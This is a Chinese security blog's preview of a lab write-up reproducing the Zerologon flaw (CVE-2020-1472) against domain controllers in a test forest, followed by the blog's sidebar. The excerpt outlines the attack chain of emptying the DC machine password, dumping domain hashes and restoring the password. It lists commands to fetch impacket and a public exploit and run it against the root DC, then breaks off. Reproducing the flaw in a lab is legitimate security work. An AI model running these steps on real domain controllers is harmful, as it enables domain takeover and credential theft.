漏洞复现

林级域环境下复现CVE-2020-1472
林级域环境下复现CVE-2020-1472
发表于|漏洞复现
环境 域林环境 根DC:10.100.100.100(server2019) 一级林DC:10.100.100.101(server2016) 二级林DC:10.100.100.102(server2012R2) 跳板机(攻击机):10.100.100.105(WIN10) 简要拓扑 过程 利用过程:将域控机器账户密码设置为空->读取域管hash->读取sam文件hash(ntds.dit)->恢复域控机器账户密码 攻击首先安装impacket: git clone https://github.com/SecureAuthCorp/impacket.gitcd impacketpip install -r requirements.txtpython setup.py install 然后下载利用脚本 git clone https://github.com/dirkjanm/CVE-2020-1472cd CVE-2020-1472 直接拿根域测,执行 python cve-2020-1472-exploit.py AD 10.100.100.100 此时 ...
avatar
Sp4ce
不傲不畏,不卑不亢,不骄不躁,不气不馁,不争不抢。
文章
72
标签
38
分类
23
Follow Me
公告
感谢访问,喜欢请多收藏 ^_^
最新文章
柠檬鸭组织样本分析
柠檬鸭组织样本分析
多级代理实验
多级代理实验
NPS弱口令之殇
NPS弱口令之殇
cobaltstrike插件CrossC2踩坑记录
cobaltstrike插件CrossC2踩坑记录
内存取证工具Volatility使用
内存取证工具Volatility使用
分类
标签
AWD AWVS11 Algorithm C CS CTF CodeReview Crack Docker Hexo Java LAMP Linux PHP Pentest Python Router SQLi VMWare VulCMS VulRepro Windows Server WriteUp XSS centos codeReview mysql 代码审计 内网渗透 域渗透 威胁情报 工具 应急响应 日常 样本分析 汉化 漏洞复现 面试
归档
网站资讯
文章数目 :
72
已运行时间 :
本站总字数 :
87.5k
本站访客数 :
本站总访问量 :
最后更新时间 :